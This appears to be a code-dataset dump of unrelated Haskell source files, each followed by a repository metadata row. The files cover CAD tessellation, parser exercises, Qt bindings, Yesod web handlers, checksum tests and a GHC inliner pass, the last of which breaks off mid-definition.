tesselateLoop res obj [as@(_:_:_:_),[_,_], bs@(_:_:_:_), [_,_] ] | length as == length bs =
    concatMap (tesselateLoop res obj)
        [[[a1,b1],[b1,b2],[b2,a2],[a2,a1]] | ((a1,b1),(a2,b2)) <- zip (init pairs) (tail pairs)]
            where pairs = zip (reverse as) bs
{-
   #__#
   |  | -> if parallegram then quad
   #__#
-}
-- NOTE: colah thought this was broken.
tesselateLoop _ _ [[a,_],[b,_],[c,_],[d,_]] | centroid [a,c] == centroid [b,d] =
    let
        b1 = normalized $ a ^-^ b
        b2 = normalized $ c ^-^ b
        b3 = b1 `cross3` b2
    in [Sq (b1,b2,b3) (a ⋅ b3) (a ⋅ b1, c ⋅ b1) (a ⋅ b2, c ⋅ b2) ]
{-
   #__#      #__#
   |  |  ->  | /|
   #__#      #/_#
-}
-- | Create a pair of triangles from a quad.
-- FIXME: magic number
tesselateLoop res obj [[a,_],[b,_],[c,_],[d,_]] | obj (centroid [a,c]) < res/30 =
    return $ Tris $ TriangleMesh [Triangle (a,b,c), Triangle (a,c,d)]
-- Fallback case: make fans
-- FIXME: magic numbers.
-- A fan around the loop's centroid, first shrinking the loop by merging
-- nearly-on-surface vertex pairs; the centroid is Newton-stepped toward the
-- surface (mid') when the gradient estimate looks trustworthy.
tesselateLoop res obj pathSides = return $ Tris $ TriangleMesh $
    let
        path' = concatMap init pathSides
        (early_tris,path) = shrinkLoop 0 path' res obj
    in if null path
    then early_tris
    else let
        mid@(_,_,_) = centroid path
        midval = obj mid
        preNormal = foldl1 (^+^)
            [ a `cross3` b | (a,b) <- zip path (tail path ++ [head path]) ]
        preNormalNorm = magnitude preNormal
        normal = preNormal ^/ preNormalNorm
        deriv = (obj (mid ^+^ (normal ^* (res/100)) ) ^-^ midval)/res*100
        mid' = mid ^-^ normal ^* (midval/deriv)
    in if abs midval > res/50 && preNormalNorm > 0.5 && abs deriv > 0.5
          && abs (midval/deriv) < 2*res && 3*abs (obj mid') < abs midval
        then early_tris ++ [Triangle (a,b,mid') | (a,b) <- zip path (tail path ++ [head path]) ]
        else early_tris ++ [Triangle (a,b,mid) | (a,b) <- zip path (tail path ++ [head path]) ]
-- | Walk around a loop, emitting a triangle and dropping the middle vertex
-- whenever a pair of second-neighbour vertices spans a near-surface midpoint.
-- The counter 'n' tracks how many rotations have been tried without progress;
-- once it exceeds the loop length we give up and return the loop unchanged.
shrinkLoop :: ℕ -> [ℝ3] -> ℝ -> Obj3 -> ([Triangle], [ℝ3])
shrinkLoop _ path@[a,b,c] res obj =
    if abs (obj $ centroid [a,b,c]) < res/50
    then
        ( [Triangle (a,b,c)], [])
    else
        ([], path)
-- FIXME: magic number.
shrinkLoop n path@(a:b:c:xs) res obj | n < genericLength path =
    if abs (obj (centroid [a,c])) < res/50
    then
        let (tris,remainder) = shrinkLoop 0 (a:c:xs) res obj
        in (Triangle (a,b,c):tris, remainder)
    else
        -- Rotate the loop by one vertex and try again.
        shrinkLoop (n+1) (b:c:xs ++ [a]) res obj
shrinkLoop _ path _ _ = ([],path)
| krakrjak/ImplicitCAD | Graphics/Implicit/Export/Render/TesselateLoops.hs | agpl-3.0 | 3,839 | 2 | 24 | 936 | 1,799 | 1,030 | 769 | 57 | 3 |
module Main where
import Graphics.UI.ShinyUI
import Graphics.UI.InterfaceDescription
main :: IO ()
main = do
    -- A window with the given class/id and an empty body, rendered with an
    -- empty style list.
    let emptyBody = return ()
        interface = window "WindowClass" "WindowId" emptyBody
    execute interface []
execute interface style | kchugalinskiy/shiny-head | samples/EmptyWindow.hs | lgpl-3.0 | 215 | 0 | 14 | 35 | 76 | 38 | 38 | 8 | 1 |
{-# LANGUAGE RankNTypes #-}
module LearnParsers where
import Text.Trifecta
import Text.Parser.Combinators
-- | A parser that always fails with the message "stop".
stop :: Parser a
stop = unexpected "stop"
-- Single-character parsers for the demo input "123".
one = char '1'
two = char '2'
three = char '3'
-- read one character, then die
one' = one >> stop
-- read two characters, '1' and '2'
oneTwo = char '1' >> char '2'
-- read two characters, '1' and '2', then die
oneTwo' = oneTwo >> stop
-- | Run a Char parser against the fixed input "123" and print the Result.
testParse :: Parser Char -> IO ()
testParse p = print (parseString p mempty "123")
-- | Same driver for unit-returning parsers (e.g. those ending in 'eof').
testEOF :: Parser () -> IO ()
testEOF p = print (parseString p mempty "123")
-- string parsers
-- | String parsers kept polymorphic over any CharParsing instance.
type S = forall m. CharParsing m => m String
oneS :: S
oneS = string "1"
oneTwoS :: S
oneTwoS = string "12"
oneTwoThreeS :: S
oneTwoThreeS = string "123"
-- | Driver for String-returning parsers, same fixed input "123".
testParse' :: Parser String -> IO ()
testParse' p =
  print $ parseString p mempty "123"
-- One Parser rules them all
-- how do we prevent >> to drop it on the floor?
--
-- | Print a section label preceded by a blank line.
pNL s = putStrLn ('\n' : s)
-- Runs each demo parser against "123" in turn; the output order is the
-- whole point of the exercise, so the sequence below must not be reordered.
main = do
  pNL "stop:"
  testParse stop
  pNL "one:"
  testParse one
  pNL "one':"
  testParse one'
  pNL "oneTwo:"
  testParse oneTwo
  pNL "oneTwo':"
  testParse oneTwo'
  pNL "one >> EOF:"
  testEOF (one >> eof)
  pNL "oneTwo >> EOF"
  testEOF (oneTwo >> eof)
  pNL "string \"1\", \"12\", \"123\""
  testParse' (choice [ oneTwoThreeS
                     , oneTwoS
                     , oneS
                     , stop ])
  pNL "char \"1\", \"12\", \"123\""
  testParse (choice [ one >> two >> three
                    , one >> two
                    , one
                    , stop ])
| dmvianna/haskellbook | src/Ch24-LearnParsers.hs | unlicense | 1,499 | 0 | 12 | 433 | 458 | 222 | 236 | 54 | 1 |
module BridgeBuddy (module BridgeBuddy) where
import BridgeBuddy.Cards as BridgeBuddy
import BridgeBuddy.CardsJson as BridgeBuddy
| derekmcloughlin/BridgeBuddyServer | library/BridgeBuddy.hs | apache-2.0 | 130 | 0 | 4 | 13 | 24 | 17 | 7 | 3 | 0 |
-- | A three-state traffic light.
data TrafficLight = Red | Yellow | Green
-- | Two lights are equal exactly when they are the same colour.
instance Eq TrafficLight where
    a == b = case (a, b) of
        (Red, Red)       -> True
        (Yellow, Yellow) -> True
        (Green, Green)   -> True
        _                -> False
-- | Human-readable rendering: "<Colour> light".
instance Show TrafficLight where
    show light = case light of
        Red    -> "Red light"
        Yellow -> "Yellow light"
        Green  -> "Green light"
| Oscarzhao/haskell | learnyouahaskell/TrafficLight.hs | apache-2.0 | 296 | 0 | 6 | 84 | 98 | 48 | 50 | 10 | 0 |
{-# OPTIONS -fglasgow-exts #-}
-----------------------------------------------------------------------------
{-| Module : QHoverEvent.hs
Copyright : (c) David Harley 2010
Project : qtHaskell
Version : 1.1.4
Modified : 2010-09-02 17:02:18
Warning : this file is machine generated - do not modify.
--}
-----------------------------------------------------------------------------
module Qtc.Gui.QHoverEvent (
QqqHoverEvent(..), QqHoverEvent(..)
,QqqHoverEvent_nf(..), QqHoverEvent_nf(..)
,qHoverEvent_delete
)
where
import Qth.ClassTypes.Core
import Qtc.Enums.Base
import Qtc.Enums.Core.QEvent
import Qtc.Classes.Base
import Qtc.Classes.Qccs
import Qtc.Classes.Core
import Qtc.ClassTypes.Core
import Qth.ClassTypes.Core
import Qtc.Classes.Gui
import Qtc.ClassTypes.Gui
-- Machine-generated qtHaskell FFI bindings: constructor classes for
-- QHoverEvent. The Qqq/Qq split distinguishes QPoint-object arguments from
-- plain Point value arguments; the _nf variants return a reference that is
-- not finalized (no garbage-collected destructor attached).
class QqqHoverEvent x1 where
  qqHoverEvent :: x1 -> IO (QHoverEvent ())
class QqHoverEvent x1 where
  qHoverEvent :: x1 -> IO (QHoverEvent ())
instance QqHoverEvent ((QHoverEvent t1)) where
 qHoverEvent (x1)
  = withQHoverEventResult $
    withObjectPtr x1 $ \cobj_x1 ->
    qtc_QHoverEvent cobj_x1
foreign import ccall "qtc_QHoverEvent" qtc_QHoverEvent :: Ptr (TQHoverEvent t1) -> IO (Ptr (TQHoverEvent ()))
instance QqqHoverEvent ((QEventType, QPoint t2, QPoint t3)) where
 qqHoverEvent (x1, x2, x3)
  = withQHoverEventResult $
    withObjectPtr x2 $ \cobj_x2 ->
    withObjectPtr x3 $ \cobj_x3 ->
    qtc_QHoverEvent1 (toCLong $ qEnum_toInt x1) cobj_x2 cobj_x3
foreign import ccall "qtc_QHoverEvent1" qtc_QHoverEvent1 :: CLong -> Ptr (TQPoint t2) -> Ptr (TQPoint t3) -> IO (Ptr (TQHoverEvent ()))
instance QqHoverEvent ((QEventType, Point, Point)) where
 qHoverEvent (x1, x2, x3)
  = withQHoverEventResult $
    withCPoint x2 $ \cpoint_x2_x cpoint_x2_y ->
    withCPoint x3 $ \cpoint_x3_x cpoint_x3_y ->
    qtc_QHoverEvent2 (toCLong $ qEnum_toInt x1) cpoint_x2_x cpoint_x2_y cpoint_x3_x cpoint_x3_y
foreign import ccall "qtc_QHoverEvent2" qtc_QHoverEvent2 :: CLong -> CInt -> CInt -> CInt -> CInt -> IO (Ptr (TQHoverEvent ()))
class QqqHoverEvent_nf x1 where
  qqHoverEvent_nf :: x1 -> IO (QHoverEvent ())
class QqHoverEvent_nf x1 where
  qHoverEvent_nf :: x1 -> IO (QHoverEvent ())
instance QqHoverEvent_nf ((QHoverEvent t1)) where
 qHoverEvent_nf (x1)
  = withObjectRefResult $
    withObjectPtr x1 $ \cobj_x1 ->
    qtc_QHoverEvent cobj_x1
instance QqqHoverEvent_nf ((QEventType, QPoint t2, QPoint t3)) where
 qqHoverEvent_nf (x1, x2, x3)
  = withObjectRefResult $
    withObjectPtr x2 $ \cobj_x2 ->
    withObjectPtr x3 $ \cobj_x3 ->
    qtc_QHoverEvent1 (toCLong $ qEnum_toInt x1) cobj_x2 cobj_x3
instance QqHoverEvent_nf ((QEventType, Point, Point)) where
 qHoverEvent_nf (x1, x2, x3)
  = withObjectRefResult $
    withCPoint x2 $ \cpoint_x2_x cpoint_x2_y ->
    withCPoint x3 $ \cpoint_x3_x cpoint_x3_y ->
    qtc_QHoverEvent2 (toCLong $ qEnum_toInt x1) cpoint_x2_x cpoint_x2_y cpoint_x3_x cpoint_x3_y
-- Accessors for the event's old/current position. The unqualified variants
-- marshal into a Haskell Point value; the q-prefixed variants return a
-- QPoint object reference.
instance QoldPos (QHoverEvent a) (()) where
 oldPos x0 ()
  = withPointResult $ \cpoint_ret_x cpoint_ret_y ->
    withObjectPtr x0 $ \cobj_x0 ->
    qtc_QHoverEvent_oldPos_qth cobj_x0 cpoint_ret_x cpoint_ret_y
foreign import ccall "qtc_QHoverEvent_oldPos_qth" qtc_QHoverEvent_oldPos_qth :: Ptr (TQHoverEvent a) -> Ptr CInt -> Ptr CInt -> IO ()
instance QqoldPos (QHoverEvent a) (()) where
 qoldPos x0 ()
  = withObjectRefResult $
    withObjectPtr x0 $ \cobj_x0 ->
    qtc_QHoverEvent_oldPos cobj_x0
foreign import ccall "qtc_QHoverEvent_oldPos" qtc_QHoverEvent_oldPos :: Ptr (TQHoverEvent a) -> IO (Ptr (TQPoint ()))
instance Qpos (QHoverEvent a) (()) (IO (Point)) where
 pos x0 ()
  = withPointResult $ \cpoint_ret_x cpoint_ret_y ->
    withObjectPtr x0 $ \cobj_x0 ->
    qtc_QHoverEvent_pos_qth cobj_x0 cpoint_ret_x cpoint_ret_y
foreign import ccall "qtc_QHoverEvent_pos_qth" qtc_QHoverEvent_pos_qth :: Ptr (TQHoverEvent a) -> Ptr CInt -> Ptr CInt -> IO ()
instance Qqpos (QHoverEvent a) (()) (IO (QPoint ())) where
 qpos x0 ()
  = withObjectRefResult $
    withObjectPtr x0 $ \cobj_x0 ->
    qtc_QHoverEvent_pos cobj_x0
foreign import ccall "qtc_QHoverEvent_pos" qtc_QHoverEvent_pos :: Ptr (TQHoverEvent a) -> IO (Ptr (TQPoint ()))
-- | Explicitly destroy the underlying C++ QHoverEvent.
qHoverEvent_delete :: QHoverEvent a -> IO ()
qHoverEvent_delete x0
  = withObjectPtr x0 $ \cobj_x0 ->
    qtc_QHoverEvent_delete cobj_x0
foreign import ccall "qtc_QHoverEvent_delete" qtc_QHoverEvent_delete :: Ptr (TQHoverEvent a) -> IO ()
| uduki/hsQt | Qtc/Gui/QHoverEvent.hs | bsd-2-clause | 4,436 | 0 | 16 | 736 | 1,320 | 688 | 632 | -1 | -1 |
module Handler.Users (getUsersR) where
import Import
import Prelude (head)
import Control.Monad (forM)
import Data.Maybe (fromMaybe)
-- | List every user together with their credential record, newest id last,
-- rendered by the user/index template.
getUsersR :: Handler RepHtml
getUsersR = do
    records <- runDB $ do
        users <- selectList [] [Asc UserId]
        creds <- selectList [] []
        forM users $ \user -> do
            let uid = entityKey user
            -- NOTE(review): partial 'head' — assumes every user has exactly
            -- one matching Ident row; a user without one crashes this
            -- handler. Confirm the invariant (or switch to a join).
            let cred = head $ filter ((== uid) . identUser . entityVal) creds
            return (user,cred)
    defaultLayout $ do
        setTitle "All users"
        $(widgetFile "user/index")
| pbrisbin/devsite | Handler/Users.hs | bsd-2-clause | 553 | 0 | 23 | 162 | 197 | 98 | 99 | 17 | 1 |
import Data.Digest.Adler32
import Data.Digest.CRC32
import Control.Monad (forM_)
import Data.ByteString (ByteString)
import Data.ByteString.Char8 (pack)
import Data.Word (Word32)
import Foreign.ForeignPtr (mallocForeignPtr)
import System.IO.Unsafe (unsafePerformIO)
import qualified Data.ByteString.Internal as I
-- | Empty 'ByteString' whose pointer is null
-- | Empty 'ByteString' whose pointer is null
emptyNull :: ByteString
emptyNull = I.PS I.nullForeignPtr 0 0
-- | Empty 'ByteString' whose pointer is not null
-- (unsafePerformIO is acceptable here: this is test fixture code and the
-- allocation is referentially transparent for a 0-length string).
emptyNotNull :: ByteString
emptyNotNull = unsafePerformIO $ do
    ptr <- mallocForeignPtr
    return $ I.PS ptr 0 0
-- | Fixture inputs: both empty representations, a NUL byte, short ASCII
-- strings, and all 256 byte values.
testStrings :: [ByteString]
testStrings =
    [ emptyNull
    , emptyNotNull
    , pack "\0"
    , pack "a"
    , pack "hello"
    , pack ['\0'..'\255']
    ]
-- | Print a label, then one indented line per fixture string showing the
-- checksum the given digest function produces, then a trailing blank line.
runTest :: String -> (ByteString -> Word32) -> IO ()
runTest label func = do
    putStrLn label
    mapM_ (\s -> putStrLn ("    " ++ show (func s))) testStrings
    putStrLn ""
-- | Golden-output driver: exercises adler32 and crc32, plus their Update
-- variants at several seed values (including boundary seeds).
main :: IO ()
main = do
    runTest "adler32" $ adler32
    runTest "adler32Update 0" $ adler32Update 0
    runTest "adler32Update 1" $ adler32Update 1
    runTest "adler32Update 123" $ adler32Update 123
    runTest "adler32Update 0xFFF0FFF0" $ adler32Update 0xFFF0FFF0
    runTest "crc32" $ crc32
    runTest "crc32Update 0" $ crc32Update 0
    runTest "crc32Update 1" $ crc32Update 1
    runTest "crc32Update 123" $ crc32Update 123
    runTest "crc32Update 0xFFFFFFFF" $ crc32Update 0xFFFFFFFF
| jkff/digest | testing/trivial.hs | bsd-2-clause | 1,594 | 0 | 12 | 451 | 409 | 204 | 205 | 41 | 1 |
{-# OPTIONS -fglasgow-exts #-}
-----------------------------------------------------------------------------
{-| Module : QGLFramebufferObject.hs
Copyright : (c) David Harley 2010
Project : qtHaskell
Version : 1.1.4
Modified : 2010-09-02 17:02:36
Warning : this file is machine generated - do not modify.
--}
-----------------------------------------------------------------------------
module Qtc.Enums.Opengl.QGLFramebufferObject (
Attachment, eNoAttachment, eCombinedDepthStencil, eDepth
)
where
import Qtc.Classes.Base
import Qtc.ClassTypes.Core (QObject, TQObject, qObjectFromPtr)
import Qtc.Core.Base (Qcs, connectSlot, qtc_connectSlot_int, wrapSlotHandler_int)
import Qtc.Enums.Base
import Qtc.Enums.Classes.Core
-- Machine-generated qtHaskell enum wrapper for
-- QGLFramebufferObject::Attachment. CAttachment is a phantom-style carrier
-- around the raw C enum value.
data CAttachment a = CAttachment a
type Attachment = QEnum(CAttachment Int)
ieAttachment :: Int -> Attachment
ieAttachment x = QEnum (CAttachment x)
instance QEnumC (CAttachment Int) where
 qEnum_toInt (QEnum (CAttachment x)) = x
 qEnum_fromInt x = QEnum (CAttachment x)
 withQEnumResult x
  = do
    ti <- x
    return $ qEnum_fromInt $ fromIntegral ti
 withQEnumListResult x
  = do
    til <- x
    return $ map qEnum_fromInt til
-- Slot plumbing: wraps a Haskell handler taking an Attachment so it can be
-- connected to a Qt int-carrying signal; frees the stable/fun pointers when
-- the receiving object has been destroyed.
instance Qcs (QObject c -> Attachment -> IO ()) where
 connectSlot _qsig_obj _qsig_nam _qslt_obj _qslt_nam _handler
  = do
    funptr <- wrapSlotHandler_int slotHandlerWrapper_int
    stptr <- newStablePtr (Wrap _handler)
    withObjectPtr _qsig_obj $ \cobj_sig ->
        withCWString _qsig_nam $ \cstr_sig ->
            withObjectPtr _qslt_obj $ \cobj_slt ->
                withCWString _qslt_nam $ \cstr_slt ->
                    qtc_connectSlot_int cobj_sig cstr_sig cobj_slt cstr_slt (toCFunPtr funptr) (castStablePtrToPtr stptr)
    return ()
  where
    slotHandlerWrapper_int :: Ptr fun -> Ptr () -> Ptr (TQObject c) -> CInt -> IO ()
    slotHandlerWrapper_int funptr stptr qobjptr cint
     = do qobj <- qObjectFromPtr qobjptr
          let hint = fromCInt cint
          if (objectIsNull qobj)
           then do when (stptr/=ptrNull)
                    (freeStablePtr (castPtrToStablePtr stptr))
                   when (funptr/=ptrNull)
                    (freeHaskellFunPtr (castPtrToFunPtr funptr))
           else _handler qobj (qEnum_fromInt hint)
          return ()
-- Enum values mirroring the C++ Attachment enumeration.
eNoAttachment :: Attachment
eNoAttachment
  = ieAttachment $ 0
eCombinedDepthStencil :: Attachment
eCombinedDepthStencil
  = ieAttachment $ 1
eDepth :: Attachment
eDepth
  = ieAttachment $ 2
| uduki/hsQt | Qtc/Enums/Opengl/QGLFramebufferObject.hs | bsd-2-clause | 2,466 | 0 | 18 | 530 | 606 | 309 | 297 | 54 | 1 |
{-# LANGUAGE DeriveDataTypeable #-}
import Network.Wai.Handler.DevelServer (run)
import System.Console.CmdArgs
import Control.Concurrent (forkIO)
-- | Command-line options record consumed by cmdArgs; the field annotations
-- live at the construction site in 'main'.
data Devel = Devel
    { port :: Int          -- ^ port to listen on
    , moduleName :: String -- ^ module containing the WAI application
    , function :: String   -- ^ name of the application function
    , yesod :: Bool        -- ^ also watch Yesod template folders
    }
    deriving (Show, Data, Typeable)
-- | Parse the command line, fork the reloading development server, then
-- block reading stdin until a line starting with 'q' quits the process.
main :: IO ()
main = do
    Devel p m f y <- cmdArgs Devel
        { port = 3000 &= argPos 0 &= typ "PORT"
        , moduleName = "" &= argPos 1 &= typ "MODULE"
        , function = "" &= argPos 2 &= typ "FUNCTION"
        , yesod = False &= help "Monitor typical Yesod folders (hamlet, etc)"
        } &= summary "WAI development web server"
    _ <- forkIO $ run p m f $ folders y
    go
  where
    -- Extra directories to watch when --yesod is set.
    folders False = []
    folders True = ["hamlet", "cassius", "julius"]
    go = do
        x <- getLine
        case x of
            'q':_ -> putStrLn "Quitting, goodbye!"
            _ -> go
| stevenrobertson/wai-handler-devel | wai-handler-devel.hs | bsd-2-clause | 893 | 0 | 14 | 273 | 289 | 151 | 138 | 27 | 3 |
{-# LANGUAGE FlexibleInstances #-}
module Foundation where
import Import.NoFoundation
import Database.Persist.Sql (ConnectionPool, runSqlPool)
import Text.Hamlet (hamletFile)
import Text.Jasmine (minifym)
import Yesod.Auth.BrowserId (authBrowserId)
import Yesod.Default.Util (addStaticContentExternal)
import Yesod.Core.Types (Logger)
import qualified Yesod.Core.Unsafe as Unsafe
import Yesod.Contrib.League.Crud
import Yesod.Contrib.League.Crud.TVarMap
import qualified Network.Wai as Wai
-- | The foundation datatype for your application. This can be a good place to
-- keep settings and values requiring initialization before your application
-- starts running, such as database connections. Every handler will have
-- access to the data present here.
data App = App
    { appSettings    :: AppSettings
    , appStatic      :: Static -- ^ Settings for static file serving.
    , appConnPool    :: ConnectionPool -- ^ Database connection pool.
    , appHttpManager :: Manager
    , appLogger      :: Logger
    , appRequests    :: TVar (Map CrudTVarKey Wai.Request) -- ^ In-memory log of every authorized request, served by LogCrud.
    }
instance HasHttpManager App where
    getHttpManager = appHttpManager
-- Three CRUD subsites: users (DB-backed), a user's publications (DB-backed,
-- parameterized by the owning UserId), and raw request logs (TVar-backed).
-- The mk*Crud helpers exist so the route file can construct the subsites.
data UserCrud = UserCrud
instance CrudTypes UserCrud where
  type Site UserCrud = App
  type ObjId UserCrud = UserId
  type Obj UserCrud = User
mkUserCrud :: a -> CrudSubsite UserCrud
mkUserCrud _ = CrudSubsite UserCrud
data PubCrud = PubCrud UserId
instance CrudTypes PubCrud where
  type Site PubCrud = App
  type ObjId PubCrud = PublicationId
  type Obj PubCrud = Publication
mkPubCrud :: a -> UserId -> CrudSubsite PubCrud
mkPubCrud _ = CrudSubsite . PubCrud
data LogCrud = LogCrud
instance CrudTypes LogCrud where
  type Site LogCrud = App
  type ObjId LogCrud = CrudTVarKey
  type Obj LogCrud = Wai.Request
mkLogCrud :: a -> CrudSubsite LogCrud
mkLogCrud _ = CrudSubsite LogCrud
-- | Override just the entity names for the log subsite; everything else
-- falls through to the default messages.
instance RenderMessage (CrudSubsite LogCrud) CrudMessage where
  renderMessage _ _ CrudMsgEntity = "Log entry"
  renderMessage _ _ CrudMsgEntities = "Log entries"
  renderMessage _ _ m = defaultCrudMessage m
instance Crud LogCrud where
  crudDB = return $ crudTVarMapDefaults $
           appRequests <$> liftHandlerT getYesod
  crudShow = return . tshow
  crudListWidget = do
    reqs <- crudSelect
    parent <- getRouter
    -- POST rows are highlighted with Bootstrap's "warning" class.
    let reqClass "POST" = asText "warning"
        reqClass _ = ""
    return $(widgetFile "request-logs")
-- This is where we define all of the routes in our application. For a full
-- explanation of the syntax, please see:
-- http://www.yesodweb.com/book/routing-and-handlers
--
-- Note that this is really half the story; in Application.hs, mkYesodDispatch
-- generates the rest of the code. Please see the linked documentation for an
-- explanation for this split.
-- Generates the route data types and render functions from config/routes.
mkYesodData "App" $(parseRoutesFile "config/routes")
-- | A convenient synonym for creating forms.
type Form x = Html -> MForm (HandlerT App IO) (FormResult x, Widget)
-- Please see the documentation for the Yesod typeclass. There are a number
-- of settings which can be configured by overriding methods here.
instance Yesod App where
    -- Controls the base of generated URLs. For more information on modifying,
    -- see: https://github.com/yesodweb/yesod/wiki/Overriding-approot
    approot = ApprootMaster $ appRoot . appSettings
    -- Store session data on the client in encrypted cookies,
    -- default session idle timeout is 120 minutes
    makeSessionBackend _ = fmap Just $ defaultClientSessionBackend
        120    -- timeout in minutes
        "config/client_session_key.aes"
    defaultLayout widget = do
        master <- getYesod
        mmsg <- getMessage
        crumbs <- breadcrumbs
        -- We break up the default layout into two components:
        -- default-layout is the contents of the body tag, and
        -- default-layout-wrapper is the entire page. Since the final
        -- value passed to hamletToRepHtml cannot be a widget, this allows
        -- you to use normal widget features in default-layout.
        pc <- widgetToPageContent $ do
            addStylesheet $ StaticR css_bootstrap_css
            $(widgetFile "default-layout")
        withUrlRenderer $(hamletFile "templates/default-layout-wrapper.hamlet")
    -- The page to be redirected to when authentication is required.
    authRoute _ = Just $ AuthR LoginR
    -- Routes not requiring authentication.
    -- NOTE: as a side effect, every single request (any route, any method)
    -- is appended to the in-memory LogCrud store before being authorized.
    isAuthorized _ _ = do
        req <- reqWaiRequest <$> getRequest
        void $ runCrudSite LogCrud LogCrudR $ crudInsert req
        return Authorized
    -- This function creates static content files in the static folder
    -- and names them based on a hash of their content. This allows
    -- expiration dates to be set far in the future without worry of
    -- users receiving stale content.
    addStaticContent ext mime content = do
        master <- getYesod
        let staticDir = appStaticDir $ appSettings master
        addStaticContentExternal
            minifym
            genFileName
            staticDir
            (StaticR . flip StaticRoute [])
            ext
            mime
            content
      where
        -- Generate a unique filename based on the content itself
        genFileName lbs = "autogen-" ++ base64md5 lbs
    -- What messages should be logged. The following includes all messages when
    -- in development, and warnings and errors in production.
    shouldLog app _source level =
        appShouldLogAll (appSettings app)
            || level == LevelWarn
            || level == LevelError
    makeLogger = return . appLogger
-- How to run database actions.
-- | Database actions run against the shared connection pool.
instance YesodPersist App where
    type YesodPersistBackend App = SqlBackend
    runDB action = do
        master <- getYesod
        runSqlPool action $ appConnPool master
instance YesodPersistRunner App where
    getDBRunner = defaultGetDBRunner appConnPool
instance YesodAuth App where
    type AuthId App = UserId
    -- Where to send a user after successful login
    loginDest _ = HomeR
    -- Where to send a user after logout
    logoutDest _ = HomeR
    -- Override the above two destinations when a Referer: header is present
    redirectToReferer _ = True
    -- Look the credential up by identifier; first login auto-creates a
    -- non-admin user row with no password or full name.
    getAuthId creds = runDB $ do
        x <- getBy $ UniqueUser $ credsIdent creds
        case x of
            Just (Entity uid _) -> return $ Just uid
            Nothing -> do
                fmap Just $ insert User
                    { userIdent = credsIdent creds
                    , userPassword = Nothing
                    , userFullName = Nothing
                    , userIsAdmin = False
                    }
    -- You can add other plugins like BrowserID, email or OAuth here
    authPlugins _ = [authBrowserId def]
    authHttpManager = getHttpManager
instance YesodAuthPersist App
-- | Breadcrumb trail for the CRUD subsites; each entry is the page title
-- plus its parent route (Nothing terminates the trail at Home).
instance YesodBreadcrumbs App where
  breadcrumb (UserCrudR CrudListR) = return ("Users", Just HomeR)
  breadcrumb (UserCrudR (CrudDeleteR uid)) = return ("Delete", Just (PubCrudR uid CrudListR))
  breadcrumb (UserCrudR (CrudUpdateR uid)) = return ("Update", Just (PubCrudR uid CrudListR))
  -- Publication pages are titled with the owning user's name (DB hit).
  breadcrumb (PubCrudR uid CrudListR) = do
    u <- runDB $ get404 uid
    return (userName u, Just (UserCrudR CrudListR))
  breadcrumb (PubCrudR uid CrudCreateR) = return ("Add publication", Just (PubCrudR uid CrudListR))
  breadcrumb (PubCrudR uid (CrudUpdateR _)) = return ("Edit publication", Just (PubCrudR uid CrudListR))
  breadcrumb (PubCrudR uid (CrudDeleteR _)) = return ("Remove publication", Just (PubCrudR uid CrudListR))
  breadcrumb (LogCrudR CrudListR) = return ("Log entries", Just HomeR)
  breadcrumb (LogCrudR (CrudDeleteR _)) = return ("Delete", Just (LogCrudR CrudListR))
  breadcrumb _ = return ("Home", Nothing)
-- This instance is required to use forms. You can modify renderMessage to
-- achieve customized and internationalized form validation messages.
instance RenderMessage App FormMessage where
    renderMessage _ _ = defaultFormMessage
-- | Run a handler outside a real request (e.g. from GHCi), reusing the
-- app's logger.
unsafeHandler :: App -> Handler a -> IO a
unsafeHandler = Unsafe.fakeHandlerGetLogger appLogger
-- Note: Some functionality previously present in the scaffolding has been
-- moved to documentation in the Wiki. Following are some hopefully helpful
-- links:
--
-- https://github.com/yesodweb/yesod/wiki/Sending-email
-- https://github.com/yesodweb/yesod/wiki/Serve-static-files-from-a-separate-domain
-- https://github.com/yesodweb/yesod/wiki/i18n-messages-in-the-scaffolding
| league/yesod-crud | example/Foundation.hs | bsd-3-clause | 8,403 | 0 | 18 | 1,892 | 1,588 | 829 | 759 | -1 | -1 |
-- The Summoner is a demand-driven inliner.
-- We give it the name of a function we want summoned, and it will inline
-- everything it can find into it.
--
-- The summoner ignores GHC generated inliner heuristics (UnfoldingGuidance)
-- as well as NOINLINE pragmas for bindings in the module being compiled.
--
-- It does respect loop breaker markers, as we can't summon into recursive
-- functions indefinately. It also respects INLINE [N] phase numbers,
-- because rewrite rules depend on these to fire.
--
module DPH.Pass.Summon
(passSummon)
where
import DPH.Core.Pretty
import HscTypes
import CoreSyn
import CoreMonad
import Avail
import Data.Maybe
import Data.Set (Set)
import qualified UniqFM as UFM
import qualified Data.Set as Set
import Control.Monad
import Debug.Trace
-- Pass -----------------------------------------------------------------------
-- | The summoner pass: demand-driven inlining into the vectorised versions
--   of all exported bindings of this module.
passSummon :: ModGuts -> CoreM ModGuts
passSummon guts
 = do   let tops        = mg_binds guts

        -- Get the names of the vectorised versions of all exported bindings.
        let nsExported  = [ n | Avail n <- mg_exports guts]

        -- Keep only exports that actually have a vectorised counterpart,
        -- looking them up in the module's vectorisation info.
        let nsExported_vect
                = catMaybes
                $ map (UFM.lookupUFM (vectInfoVar $ mg_vect_info guts))
                $ nsExported

        -- Summon all of the vectorised things.
        let summonMe
                = Set.fromList
                $ map snd
                $ nsExported_vect

        -- Rewrite every top-level binding, summoning into the ones
        -- whose binder is in the set.
        tops' <- mapM (summonTop summonMe tops) tops
        return $ guts { mg_binds = tops' }
-- Top ------------------------------------------------------------------------
-- | If some `CoreBind` is in the set, then summon all its parts.
summonTop
        :: Set CoreBndr         -- ^ Summon into bindings with these binders.
        -> [CoreBind]           -- ^ All the top-level bindings for this module.
        -> CoreBind             -- ^ Binding to inspect
        -> CoreM CoreBind

summonTop bsSet tops bind
 = case bind of
        NonRec b x
         -> do  (b', x') <- goSummon (b, x)
                return $ NonRec b' x'

        Rec bxs
         -> do  bxs' <- mapM goSummon bxs
                return $ Rec bxs'
 where
        -- Only summon into bindings named in the set;
        -- all other bindings pass through unchanged.
        goSummon (b, x)
         | Set.member b bsSet   = summon tops (b, x)
         | otherwise            = return (b, x)
-- Summon ---------------------------------------------------------------------
-- | Inline everything we can find into this binding.
summon  :: [CoreBind]                   -- ^ All the top-level bindings for this module.
        -> (CoreBndr, Expr CoreBndr)    -- ^ The binding to work on.
        -> CoreM (CoreBndr, Expr CoreBndr)

summon tops (b, xx)
 -- Debug trace announcing which binding is being summoned into.
 = trace (renderIndent $ text "summoning " <> ppr b)
 $ do   xx' <- summonX tops xx
        return (b, xx')
-- | Summon into an expression, recursively replacing references to
--   top-level bindings by (summoned copies of) their right-hand sides.
summonX :: [CoreBind]
        -> Expr CoreBndr
        -> CoreM (Expr CoreBndr)

